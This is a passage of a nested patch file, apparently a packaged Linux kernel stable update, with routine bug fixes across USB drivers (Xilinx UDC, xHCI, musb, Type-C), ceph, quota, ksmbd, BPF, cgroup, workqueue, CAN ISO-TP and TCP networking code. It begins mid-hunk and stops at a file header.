+ 		eprambase = (u32 __force *)(udc->addr + ep->rambase);
+ 		if (ep->is_in) {
+-			memcpy(eprambase, bufferptr, bytestosend);
++			memcpy_toio((void __iomem *)eprambase, bufferptr,
++				    bytestosend);
+ 			udc->write_fn(udc->addr, ep->offset +
+ 				      XUSB_EP_BUF0COUNT_OFFSET, bufferlen);
+ 		} else {
+-			memcpy(bufferptr, eprambase, bytestosend);
++			memcpy_toio((void __iomem *)bufferptr, eprambase,
++				    bytestosend);
+ 		}
+ 		/*
+ 		 * Enable the buffer for transmission.
+@@ -517,11 +519,13 @@ static int xudc_eptxrx(struct xusb_ep *ep, struct xusb_req *req,
+ 		eprambase = (u32 __force *)(udc->addr + ep->rambase +
+ 			     ep->ep_usb.maxpacket);
+ 		if (ep->is_in) {
+-			memcpy(eprambase, bufferptr, bytestosend);
++			memcpy_toio((void __iomem *)eprambase, bufferptr,
++				    bytestosend);
+ 			udc->write_fn(udc->addr, ep->offset +
+ 				      XUSB_EP_BUF1COUNT_OFFSET, bufferlen);
+ 		} else {
+-			memcpy(bufferptr, eprambase, bytestosend);
++			memcpy_toio((void __iomem *)bufferptr, eprambase,
++				    bytestosend);
+ 		}
+ 		/*
+ 		 * Enable the buffer for transmission.
+@@ -1023,7 +1027,7 @@ static int __xudc_ep0_queue(struct xusb_ep *ep0, struct xusb_req *req)
+ 			   udc->addr);
+ 		length = req->usb_req.actual = min_t(u32, length,
+ 						     EP0_MAX_PACKET);
+-		memcpy(corebuf, req->usb_req.buf, length);
++		memcpy_toio((void __iomem *)corebuf, req->usb_req.buf, length);
+ 		udc->write_fn(udc->addr, XUSB_EP_BUF0COUNT_OFFSET, length);
+ 		udc->write_fn(udc->addr, XUSB_BUFFREADY_OFFSET, 1);
+ 	} else {
+@@ -1752,7 +1756,7 @@ static void xudc_handle_setup(struct xusb_udc *udc)
+ 
+ 	/* Load up the chapter 9 command buffer.*/
+ 	ep0rambase = (u32 __force *) (udc->addr + XUSB_SETUP_PKT_ADDR_OFFSET);
+-	memcpy(&setup, ep0rambase, 8);
++	memcpy_toio((void __iomem *)&setup, ep0rambase, 8);
+ 
+ 	udc->setup = setup;
+ 	udc->setup.wValue = cpu_to_le16(setup.wValue);
+@@ -1839,7 +1843,7 @@ static void xudc_ep0_out(struct xusb_udc *udc)
+ 			     (ep0->rambase << 2));
+ 		buffer = req->usb_req.buf + req->usb_req.actual;
+ 		req->usb_req.actual = req->usb_req.actual + bytes_to_rx;
+-		memcpy(buffer, ep0rambase, bytes_to_rx);
++		memcpy_toio((void __iomem *)buffer, ep0rambase, bytes_to_rx);
+ 
+ 		if (req->usb_req.length == req->usb_req.actual) {
+ 			/* Data transfer completed get ready for Status stage */
+@@ -1915,7 +1919,7 @@ static void xudc_ep0_in(struct xusb_udc *udc)
+ 				     (ep0->rambase << 2));
+ 			buffer = req->usb_req.buf + req->usb_req.actual;
+ 			req->usb_req.actual = req->usb_req.actual + length;
+-			memcpy(ep0rambase, buffer, length);
++			memcpy_toio((void __iomem *)ep0rambase, buffer, length);
+ 		}
+ 		udc->write_fn(udc->addr, XUSB_EP_BUF0COUNT_OFFSET, count);
+ 		udc->write_fn(udc->addr, XUSB_BUFFREADY_OFFSET, 1);
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 281690c582cba..1239e06dfe411 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -764,7 +764,7 @@ static void xhci_giveback_urb_in_irq(struct xhci_hcd *xhci,
+ static void xhci_unmap_td_bounce_buffer(struct xhci_hcd *xhci,
+ 		struct xhci_ring *ring, struct xhci_td *td)
+ {
+-	struct device *dev = xhci_to_hcd(xhci)->self.controller;
++	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
+ 	struct xhci_segment *seg = td->bounce_seg;
+ 	struct urb *urb = td->urb;
+ 	size_t len;
+@@ -3455,7 +3455,7 @@ static u32 xhci_td_remainder(struct xhci_hcd *xhci, int transferred,
+ static int xhci_align_td(struct xhci_hcd *xhci, struct urb *urb, u32 enqd_len,
+ 			 u32 *trb_buff_len, struct xhci_segment *seg)
+ {
+-	struct device *dev = xhci_to_hcd(xhci)->self.controller;
++	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
+ 	unsigned int unalign;
+ 	unsigned int max_pkt;
+ 	u32 new_buff_len;
+diff --git a/drivers/usb/musb/musb_debugfs.c b/drivers/usb/musb/musb_debugfs.c
+index 30a89aa8a3e7a..5401ae66894eb 100644
+--- a/drivers/usb/musb/musb_debugfs.c
++++ b/drivers/usb/musb/musb_debugfs.c
+@@ -39,7 +39,7 @@ static const struct musb_register_map musb_regmap[] = {
+ 	{ "IntrUsbE",	MUSB_INTRUSBE,	8 },
+ 	{ "DevCtl",	MUSB_DEVCTL,	8 },
+ 	{ "VControl",	0x68,		32 },
+-	{ "HWVers",	0x69,		16 },
++	{ "HWVers",	MUSB_HWVERS,	16 },
+ 	{ "LinkInfo",	MUSB_LINKINFO,	8 },
+ 	{ "VPLen",	MUSB_VPLEN,	8 },
+ 	{ "HS_EOF1",	MUSB_HS_EOF1,	8 },
+diff --git a/drivers/usb/musb/musb_host.c b/drivers/usb/musb/musb_host.c
+index 9ff7d891b4b76..ef0b1589b10eb 100644
+--- a/drivers/usb/musb/musb_host.c
++++ b/drivers/usb/musb/musb_host.c
+@@ -321,10 +321,16 @@ static void musb_advance_schedule(struct musb *musb, struct urb *urb,
+ 	musb_giveback(musb, urb, status);
+ 	qh->is_ready = ready;
+ 
++	/*
++	 * musb->lock had been unlocked in musb_giveback, so qh may
++	 * be freed, need to get it again
++	 */
++	qh = musb_ep_get_qh(hw_ep, is_in);
++
+ 	/* reclaim resources (and bandwidth) ASAP; deschedule it, and
+ 	 * invalidate qh as soon as list_empty(&hep->urb_list)
+ 	 */
+-	if (list_empty(&qh->hep->urb_list)) {
++	if (qh && list_empty(&qh->hep->urb_list)) {
+ 		struct list_head	*head;
+ 		struct dma_controller	*dma = musb->dma_controller;
+ 
+@@ -2398,6 +2404,7 @@ static int musb_urb_dequeue(struct usb_hcd *hcd, struct urb *urb, int status)
+ 		 * and its URB list has emptied, recycle this qh.
+ 		 */
+ 		if (ready && list_empty(&qh->hep->urb_list)) {
++			musb_ep_set_qh(qh->hw_ep, is_in, NULL);
+ 			qh->hep->hcpriv = NULL;
+ 			list_del(&qh->ring);
+ 			kfree(qh);
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 7a3caf556dae9..f564d0d471bbc 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -301,6 +301,11 @@ static int dp_altmode_vdm(struct typec_altmode *alt,
+ 		case CMD_EXIT_MODE:
+ 			dp->data.status = 0;
+ 			dp->data.conf = 0;
++			if (dp->hpd) {
++				drm_connector_oob_hotplug_event(dp->connector_fwnode);
++				dp->hpd = false;
++				sysfs_notify(&dp->alt->dev.kobj, "displayport", "hpd");
++			}
+ 			break;
+ 		case DP_CMD_STATUS_UPDATE:
+ 			dp->data.status = *vdo;
+diff --git a/drivers/usb/typec/ucsi/psy.c b/drivers/usb/typec/ucsi/psy.c
+index 384b42267f1fc..b35c6e07911e9 100644
+--- a/drivers/usb/typec/ucsi/psy.c
++++ b/drivers/usb/typec/ucsi/psy.c
+@@ -37,6 +37,15 @@ static int ucsi_psy_get_scope(struct ucsi_connector *con,
+ 	struct device *dev = con->ucsi->dev;
+ 
+ 	device_property_read_u8(dev, "scope", &scope);
++	if (scope == POWER_SUPPLY_SCOPE_UNKNOWN) {
++		u32 mask = UCSI_CAP_ATTR_POWER_AC_SUPPLY |
++			   UCSI_CAP_ATTR_BATTERY_CHARGING;
++
++		if (con->ucsi->cap.attributes & mask)
++			scope = POWER_SUPPLY_SCOPE_SYSTEM;
++		else
++			scope = POWER_SUPPLY_SCOPE_DEVICE;
++	}
+ 	val->intval = scope;
+ 	return 0;
+ }
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 47a2c73df3420..dc2dea3768fb6 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -785,6 +785,7 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	if (ret < 0) {
+ 		dev_err(ucsi->dev, "%s: GET_CONNECTOR_STATUS failed (%d)\n",
+ 			__func__, ret);
++		clear_bit(EVENT_PENDING, &con->ucsi->flags);
+ 		goto out_unlock;
+ 	}
+ 
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 02414437d8abf..882eccfd67e84 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2498,7 +2498,7 @@ static ssize_t __ceph_copy_file_range(struct file *src_file, loff_t src_off,
+ 		ret = do_splice_direct(src_file, &src_off, dst_file,
+ 				       &dst_off, src_objlen, flags);
+ 		/* Abort on short copies or on error */
+-		if (ret < src_objlen) {
++		if (ret < (long)src_objlen) {
+ 			dout("Failed partial copy (%zd)\n", ret);
+ 			goto out;
+ 		}
+diff --git a/fs/ceph/inode.c b/fs/ceph/inode.c
+index bad9eeb6a1a59..29384ec1a524c 100644
+--- a/fs/ceph/inode.c
++++ b/fs/ceph/inode.c
+@@ -655,9 +655,7 @@ int ceph_fill_file_size(struct inode *inode, int issued,
+ 			ci->i_truncate_seq = truncate_seq;
+ 
+ 			/* the MDS should have revoked these caps */
+-			WARN_ON_ONCE(issued & (CEPH_CAP_FILE_EXCL |
+-					       CEPH_CAP_FILE_RD |
+-					       CEPH_CAP_FILE_WR |
++			WARN_ON_ONCE(issued & (CEPH_CAP_FILE_RD |
+ 					       CEPH_CAP_FILE_LAZYIO));
+ 			/*
+ 			 * If we hold relevant caps, or in the case where we're
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index 53b65c5300fde..f26ddfcaa5e61 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -233,19 +233,18 @@ static void put_quota_format(struct quota_format_type *fmt)
+  * All dquots are placed to the end of inuse_list when first created, and this
+  * list is used for invalidate operation, which must look at every dquot.
+  *
+- * When the last reference of a dquot will be dropped, the dquot will be
+- * added to releasing_dquots. We'd then queue work item which would call
++ * When the last reference of a dquot is dropped, the dquot is added to
++ * releasing_dquots. We'll then queue work item which will call
+  * synchronize_srcu() and after that perform the final cleanup of all the
+- * dquots on the list. Both releasing_dquots and free_dquots use the
+- * dq_free list_head in the dquot struct. When a dquot is removed from
+- * releasing_dquots, a reference count is always subtracted, and if
+- * dq_count == 0 at that point, the dquot will be added to the free_dquots.
++ * dquots on the list. Each cleaned up dquot is moved to free_dquots list.
++ * Both releasing_dquots and free_dquots use the dq_free list_head in the dquot
++ * struct.
+  *
+- * Unused dquots (dq_count == 0) are added to the free_dquots list when freed,
+- * and this list is searched whenever we need an available dquot.  Dquots are
+- * removed from the list as soon as they are used again, and
+- * dqstats.free_dquots gives the number of dquots on the list. When
+- * dquot is invalidated it's completely released from memory.
++ * Unused and cleaned up dquots are in the free_dquots list and this list is
++ * searched whenever we need an available dquot. Dquots are removed from the
++ * list as soon as they are used again and dqstats.free_dquots gives the number
++ * of dquots on the list. When dquot is invalidated it's completely released
++ * from memory.
+  *
+  * Dirty dquots are added to the dqi_dirty_list of quota_info when mark
+  * dirtied, and this list is searched when writing dirty dquots back to
+@@ -321,6 +320,7 @@ static inline void put_dquot_last(struct dquot *dquot)
+ static inline void put_releasing_dquots(struct dquot *dquot)
+ {
+ 	list_add_tail(&dquot->dq_free, &releasing_dquots);
++	set_bit(DQ_RELEASING_B, &dquot->dq_flags);
+ }
+ 
+ static inline void remove_free_dquot(struct dquot *dquot)
+@@ -328,8 +328,10 @@ static inline void remove_free_dquot(struct dquot *dquot)
+ 	if (list_empty(&dquot->dq_free))
+ 		return;
+ 	list_del_init(&dquot->dq_free);
+-	if (!atomic_read(&dquot->dq_count))
++	if (!test_bit(DQ_RELEASING_B, &dquot->dq_flags))
+ 		dqstats_dec(DQST_FREE_DQUOTS);
++	else
++		clear_bit(DQ_RELEASING_B, &dquot->dq_flags);
+ }
+ 
+ static inline void put_inuse(struct dquot *dquot)
+@@ -581,12 +583,6 @@ restart:
+ 			continue;
+ 		/* Wait for dquot users */
+ 		if (atomic_read(&dquot->dq_count)) {
+-			/* dquot in releasing_dquots, flush and retry */
+-			if (!list_empty(&dquot->dq_free)) {
+-				spin_unlock(&dq_list_lock);
+-				goto restart;
+-			}
+-
+ 			atomic_inc(&dquot->dq_count);
+ 			spin_unlock(&dq_list_lock);
+ 			/*
+@@ -605,6 +601,15 @@ restart:
+ 			 * restart. */
+ 			goto restart;
+ 		}
++		/*
++		 * The last user already dropped its reference but dquot didn't
++		 * get fully cleaned up yet. Restart the scan which flushes the
++		 * work cleaning up released dquots.
++		 */
++		if (test_bit(DQ_RELEASING_B, &dquot->dq_flags)) {
++			spin_unlock(&dq_list_lock);
++			goto restart;
++		}
+ 		/*
+ 		 * Quota now has no users and it has been written on last
+ 		 * dqput()
+@@ -696,6 +701,13 @@ int dquot_writeback_dquots(struct super_block *sb, int type)
+ 						 dq_dirty);
+ 
+ 			WARN_ON(!dquot_active(dquot));
++			/* If the dquot is releasing we should not touch it */
++			if (test_bit(DQ_RELEASING_B, &dquot->dq_flags)) {
++				spin_unlock(&dq_list_lock);
++				flush_delayed_work(&quota_release_work);
++				spin_lock(&dq_list_lock);
++				continue;
++			}
+ 
+ 			/* Now we have active dquot from which someone is
+  			 * holding reference so we can safely just increase
+@@ -809,18 +821,18 @@ static void quota_release_workfn(struct work_struct *work)
+ 	/* Exchange the list head to avoid livelock. */
+ 	list_replace_init(&releasing_dquots, &rls_head);
+ 	spin_unlock(&dq_list_lock);
++	synchronize_srcu(&dquot_srcu);
+ 
+ restart:
+-	synchronize_srcu(&dquot_srcu);
+ 	spin_lock(&dq_list_lock);
+ 	while (!list_empty(&rls_head)) {
+ 		dquot = list_first_entry(&rls_head, struct dquot, dq_free);
+-		/* Dquot got used again? */
+-		if (atomic_read(&dquot->dq_count) > 1) {
+-			remove_free_dquot(dquot);
+-			atomic_dec(&dquot->dq_count);
+-			continue;
+-		}
++		WARN_ON_ONCE(atomic_read(&dquot->dq_count));
++		/*
++		 * Note that DQ_RELEASING_B protects us from racing with
++		 * invalidate_dquots() calls so we are safe to work with the
++		 * dquot even after we drop dq_list_lock.
++		 */
+ 		if (dquot_dirty(dquot)) {
+ 			spin_unlock(&dq_list_lock);
+ 			/* Commit dquot before releasing */
+@@ -834,7 +846,6 @@ restart:
+ 		}
+ 		/* Dquot is inactive and clean, now move it to free list */
+ 		remove_free_dquot(dquot);
+-		atomic_dec(&dquot->dq_count);
+ 		put_dquot_last(dquot);
+ 	}
+ 	spin_unlock(&dq_list_lock);
+@@ -875,6 +886,7 @@ void dqput(struct dquot *dquot)
+ 	BUG_ON(!list_empty(&dquot->dq_free));
+ #endif
+ 	put_releasing_dquots(dquot);
++	atomic_dec(&dquot->dq_count);
+ 	spin_unlock(&dq_list_lock);
+ 	queue_delayed_work(system_unbound_wq, &quota_release_work, 1);
+ }
+@@ -963,7 +975,7 @@ we_slept:
+ 		dqstats_inc(DQST_LOOKUPS);
+ 	}
+ 	/* Wait for dq_lock - after this we know that either dquot_release() is
+-	 * already finished or it will be canceled due to dq_count > 1 test */
++	 * already finished or it will be canceled due to dq_count > 0 test */
+ 	wait_on_dquot(dquot);
+ 	/* Read the dquot / allocate space in quota file */
+ 	if (!dquot_active(dquot)) {
+diff --git a/fs/smb/server/vfs_cache.c b/fs/smb/server/vfs_cache.c
+index 0ae5dd0829e92..6ec6c129465d3 100644
+--- a/fs/smb/server/vfs_cache.c
++++ b/fs/smb/server/vfs_cache.c
+@@ -105,7 +105,7 @@ int ksmbd_query_inode_status(struct inode *inode)
+ 	ci = __ksmbd_inode_lookup(inode);
+ 	if (ci) {
+ 		ret = KSMBD_INODE_STATUS_OK;
+-		if (ci->m_flags & S_DEL_PENDING)
++		if (ci->m_flags & (S_DEL_PENDING | S_DEL_ON_CLS))
+ 			ret = KSMBD_INODE_STATUS_PENDING_DELETE;
+ 		atomic_dec(&ci->m_count);
+ 	}
+@@ -115,7 +115,7 @@ int ksmbd_query_inode_status(struct inode *inode)
+ 
+ bool ksmbd_inode_pending_delete(struct ksmbd_file *fp)
+ {
+-	return (fp->f_ci->m_flags & S_DEL_PENDING);
++	return (fp->f_ci->m_flags & (S_DEL_PENDING | S_DEL_ON_CLS));
+ }
+ 
+ void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp)
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index be572c3a4dcdd..3dfb994312b1f 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -548,6 +548,25 @@ static inline void dma_fence_set_error(struct dma_fence *fence,
+ 	fence->error = error;
+ }
+ 
++/**
++ * dma_fence_timestamp - helper to get the completion timestamp of a fence
++ * @fence: fence to get the timestamp from.
++ *
++ * After a fence is signaled the timestamp is updated with the signaling time,
++ * but setting the timestamp can race with tasks waiting for the signaling. This
++ * helper busy waits for the correct timestamp to appear.
++ */
++static inline ktime_t dma_fence_timestamp(struct dma_fence *fence)
++{
++	if (WARN_ON(!test_bit(DMA_FENCE_FLAG_SIGNALED_BIT, &fence->flags)))
++		return ktime_get();
++
++	while (!test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT, &fence->flags))
++		cpu_relax();
++
++	return fence->timestamp;
++}
++
+ signed long dma_fence_wait_timeout(struct dma_fence *,
+ 				   bool intr, signed long timeout);
+ signed long dma_fence_wait_any_timeout(struct dma_fence **fences,
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index a9ec8d97a715b..45910aebc3778 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -189,6 +189,7 @@ enum {
+ 	ATA_PFLAG_UNLOADING	= (1 << 9), /* driver is being unloaded */
+ 	ATA_PFLAG_UNLOADED	= (1 << 10), /* driver is unloaded */
+ 
++	ATA_PFLAG_RESUMING	= (1 << 16),  /* port is being resumed */
+ 	ATA_PFLAG_SUSPENDED	= (1 << 17), /* port is suspended (power) */
+ 	ATA_PFLAG_PM_PENDING	= (1 << 18), /* PM operation pending */
+ 	ATA_PFLAG_INIT_GTM_VALID = (1 << 19), /* initial gtm data valid */
+@@ -311,8 +312,10 @@ enum {
+ 	ATA_EH_RESET		= ATA_EH_SOFTRESET | ATA_EH_HARDRESET,
+ 	ATA_EH_ENABLE_LINK	= (1 << 3),
+ 	ATA_EH_PARK		= (1 << 5), /* unload heads and stop I/O */
++	ATA_EH_SET_ACTIVE	= (1 << 6), /* Set a device to active power mode */
+ 
+-	ATA_EH_PERDEV_MASK	= ATA_EH_REVALIDATE | ATA_EH_PARK,
++	ATA_EH_PERDEV_MASK	= ATA_EH_REVALIDATE | ATA_EH_PARK |
++				  ATA_EH_SET_ACTIVE,
+ 	ATA_EH_ALL_ACTIONS	= ATA_EH_REVALIDATE | ATA_EH_RESET |
+ 				  ATA_EH_ENABLE_LINK,
+ 
+@@ -350,7 +353,7 @@ enum {
+ 	/* This should match the actual table size of
+ 	 * ata_eh_cmd_timeout_table in libata-eh.c.
+ 	 */
+-	ATA_EH_CMD_TIMEOUT_TABLE_SIZE = 7,
++	ATA_EH_CMD_TIMEOUT_TABLE_SIZE = 8,
+ 
+ 	/* Horkage types. May be set by libata or controller on drives
+ 	   (some horkage may be drive/controller pair dependent */
+diff --git a/include/linux/mcb.h b/include/linux/mcb.h
+index f6efb16f9d1b4..91ec9a83149e8 100644
+--- a/include/linux/mcb.h
++++ b/include/linux/mcb.h
+@@ -63,7 +63,6 @@ static inline struct mcb_bus *to_mcb_bus(struct device *dev)
+ struct mcb_device {
+ 	struct device dev;
+ 	struct mcb_bus *bus;
+-	bool is_added;
+ 	struct mcb_driver *driver;
+ 	u16 id;
+ 	int inst;
+diff --git a/include/linux/quota.h b/include/linux/quota.h
+index fd692b4a41d5f..07071e64abf3d 100644
+--- a/include/linux/quota.h
++++ b/include/linux/quota.h
+@@ -285,7 +285,9 @@ static inline void dqstats_dec(unsigned int type)
+ #define DQ_FAKE_B	3	/* no limits only usage */
+ #define DQ_READ_B	4	/* dquot was read into memory */
+ #define DQ_ACTIVE_B	5	/* dquot is active (dquot_release not called) */
+-#define DQ_LASTSET_B	6	/* Following 6 bits (see QIF_) are reserved\
++#define DQ_RELEASING_B	6	/* dquot is in releasing_dquots list waiting
++				 * to be cleaned up */
++#define DQ_LASTSET_B	7	/* Following 6 bits (see QIF_) are reserved\
+ 				 * for the mask of entries set via SETQUOTA\
+ 				 * quotactl. They are set under dq_data_lock\
+ 				 * and the quota format handling dquot can\
+diff --git a/include/linux/quotaops.h b/include/linux/quotaops.h
+index 0d8625d717339..3abd249ec3373 100644
+--- a/include/linux/quotaops.h
++++ b/include/linux/quotaops.h
+@@ -57,7 +57,7 @@ static inline bool dquot_is_busy(struct dquot *dquot)
+ {
+ 	if (test_bit(DQ_MOD_B, &dquot->dq_flags))
+ 		return true;
+-	if (atomic_read(&dquot->dq_count) > 1)
++	if (atomic_read(&dquot->dq_count) > 0)
+ 		return true;
+ 	return false;
+ }
+diff --git a/include/net/macsec.h b/include/net/macsec.h
+index 5b9c61c4d3a62..65c93959c2dc5 100644
+--- a/include/net/macsec.h
++++ b/include/net/macsec.h
+@@ -257,6 +257,7 @@ struct macsec_context {
+ 	struct macsec_secy *secy;
+ 	struct macsec_rx_sc *rx_sc;
+ 	struct {
++		bool update_pn;
+ 		unsigned char assoc_num;
+ 		u8 key[MACSEC_MAX_KEY_LEN];
+ 		union {
+diff --git a/include/net/netns/ipv4.h b/include/net/netns/ipv4.h
+index 1b80046794451..ede2ff1da53a3 100644
+--- a/include/net/netns/ipv4.h
++++ b/include/net/netns/ipv4.h
+@@ -64,6 +64,7 @@ struct netns_ipv4 {
+ #endif
+ 	bool			fib_has_custom_local_routes;
+ 	bool			fib_offload_disabled;
++	u8			sysctl_tcp_shrink_window;
+ #ifdef CONFIG_IP_ROUTE_CLASSID
+ 	atomic_t		fib_num_tclassid_users;
+ #endif
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 3052680201e57..eb3f52be115d6 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -10778,7 +10778,7 @@ static int check_return_code(struct bpf_verifier_env *env)
+ 	struct tnum enforce_attach_type_range = tnum_unknown;
+ 	const struct bpf_prog *prog = env->prog;
+ 	struct bpf_reg_state *reg;
+-	struct tnum range = tnum_range(0, 1);
++	struct tnum range = tnum_range(0, 1), const_0 = tnum_const(0);
+ 	enum bpf_prog_type prog_type = resolve_prog_type(env->prog);
+ 	int err;
+ 	struct bpf_func_state *frame = env->cur_state->frame[0];
+@@ -10826,8 +10826,8 @@ static int check_return_code(struct bpf_verifier_env *env)
+ 			return -EINVAL;
+ 		}
+ 
+-		if (!tnum_in(tnum_const(0), reg->var_off)) {
+-			verbose_invalid_scalar(env, reg, &range, "async callback", "R0");
++		if (!tnum_in(const_0, reg->var_off)) {
++			verbose_invalid_scalar(env, reg, &const_0, "async callback", "R0");
+ 			return -EINVAL;
+ 		}
+ 		return 0;
+diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
+index 5407241dbb45f..289cc873cb719 100644
+--- a/kernel/cgroup/cgroup-v1.c
++++ b/kernel/cgroup/cgroup-v1.c
+@@ -360,10 +360,9 @@ static int pidlist_array_load(struct cgroup *cgrp, enum cgroup_filetype type,
+ 	}
+ 	css_task_iter_end(&it);
+ 	length = n;
+-	/* now sort & (if procs) strip out duplicates */
++	/* now sort & strip out duplicates (tgids or recycled thread PIDs) */
+ 	sort(array, length, sizeof(pid_t), cmppid, NULL);
+-	if (type == CGROUP_FILE_PROCS)
+-		length = pidlist_uniq(array, length);
++	length = pidlist_uniq(array, length);
+ 
+ 	l = cgroup_pidlist_find_create(cgrp, type);
+ 	if (!l) {
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 1e1557e42d2cc..bc1a97ee40b21 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -5355,9 +5355,13 @@ static int workqueue_apply_unbound_cpumask(const cpumask_var_t unbound_cpumask)
+ 	list_for_each_entry(wq, &workqueues, list) {
+ 		if (!(wq->flags & WQ_UNBOUND))
+ 			continue;
++
+ 		/* creating multiple pwqs breaks ordering guarantee */
+-		if (wq->flags & __WQ_ORDERED)
+-			continue;
++		if (!list_empty(&wq->pwqs)) {
++			if (wq->flags & __WQ_ORDERED_EXPLICIT)
++				continue;
++			wq->flags &= ~__WQ_ORDERED;
++		}
+ 
+ 		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs, unbound_cpumask);
+ 		if (!ctx) {
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 8c97f4061ffd7..545889935d39c 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -925,21 +925,18 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 	if (!so->bound || so->tx.state == ISOTP_SHUTDOWN)
+ 		return -EADDRNOTAVAIL;
+ 
+-wait_free_buffer:
+-	/* we do not support multiple buffers - for now */
+-	if (wq_has_sleeper(&so->wait) && (msg->msg_flags & MSG_DONTWAIT))
+-		return -EAGAIN;
++	while (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
++		/* we do not support multiple buffers - for now */
++		if (msg->msg_flags & MSG_DONTWAIT)
++			return -EAGAIN;
+ 
+-	/* wait for complete transmission of current pdu */
+-	err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+-	if (err)
+-		goto err_event_drop;
+-
+-	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
+ 		if (so->tx.state == ISOTP_SHUTDOWN)
+ 			return -EADDRNOTAVAIL;
+ 
+-		goto wait_free_buffer;
++		/* wait for complete transmission of current pdu */
++		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		if (err)
++			goto err_event_drop;
+ 	}
+ 
+ 	if (!size || size > MAX_MSG_LENGTH) {
+diff --git a/net/ceph/messenger.c b/net/ceph/messenger.c
+index 09feb3f1fcaa3..b9b64a2427caf 100644
+--- a/net/ceph/messenger.c
++++ b/net/ceph/messenger.c
+@@ -454,8 +454,8 @@ int ceph_tcp_connect(struct ceph_connection *con)
+ 	set_sock_callbacks(sock, con);
+ 
+ 	con_sock_state_connecting(con);
+-	ret = sock->ops->connect(sock, (struct sockaddr *)&ss, sizeof(ss),
+-				 O_NONBLOCK);
++	ret = kernel_connect(sock, (struct sockaddr *)&ss, sizeof(ss),
++			     O_NONBLOCK);
+ 	if (ret == -EINPROGRESS) {
+ 		dout("connect %s EINPROGRESS sk_state = %u\n",
+ 		     ceph_pr_addr(&con->peer_addr),
+diff --git a/net/core/dev.c b/net/core/dev.c
+index a2e3c6470ab3f..5374761f5af2c 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3274,15 +3274,19 @@ int skb_checksum_help(struct sk_buff *skb)
+ 
+ 	offset = skb_checksum_start_offset(skb);
+ 	ret = -EINVAL;
+-	if (WARN_ON_ONCE(offset >= skb_headlen(skb))) {
++	if (unlikely(offset >= skb_headlen(skb))) {
+ 		DO_ONCE_LITE(skb_dump, KERN_ERR, skb, false);
++		WARN_ONCE(true, "offset (%d) >= skb_headlen() (%u)\n",
++			  offset, skb_headlen(skb));
+ 		goto out;
+ 	}
+ 	csum = skb_checksum(skb, offset, skb->len - offset, 0);
+ 
+ 	offset += skb->csum_offset;
+-	if (WARN_ON_ONCE(offset + sizeof(__sum16) > skb_headlen(skb))) {
++	if (unlikely(offset + sizeof(__sum16) > skb_headlen(skb))) {
+ 		DO_ONCE_LITE(skb_dump, KERN_ERR, skb, false);
++		WARN_ONCE(true, "offset+2 (%zu) > skb_headlen() (%u)\n",
++			  offset + sizeof(__sum16), skb_headlen(skb));
+ 		goto out;
+ 	}
+ 	ret = skb_ensure_writable(skb, offset + sizeof(__sum16));
+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index f68762ce4d8a3..73e5821584c18 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -1387,6 +1387,15 @@ static struct ctl_table ipv4_net_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 		.extra2		= SYSCTL_TWO,
+ 	},
++	{
++		.procname	= "tcp_shrink_window",
++		.data		= &init_net.ipv4.sysctl_tcp_shrink_window,
++		.maxlen		= sizeof(u8),
++		.mode		= 0644,
++		.proc_handler	= proc_dou8vec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_ONE,
++	},
+ 	{ }
+ };
+ 
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index f9b8a4a1d2edc..5df19f93f86ab 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -3221,6 +3221,8 @@ static int __net_init tcp_sk_init(struct net *net)
+ 	else
+ 		net->ipv4.tcp_congestion_control = &tcp_reno;
+ 
++	net->ipv4.sysctl_tcp_shrink_window = 0;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 5921b0f6f9f41..443b1cab25299 100644
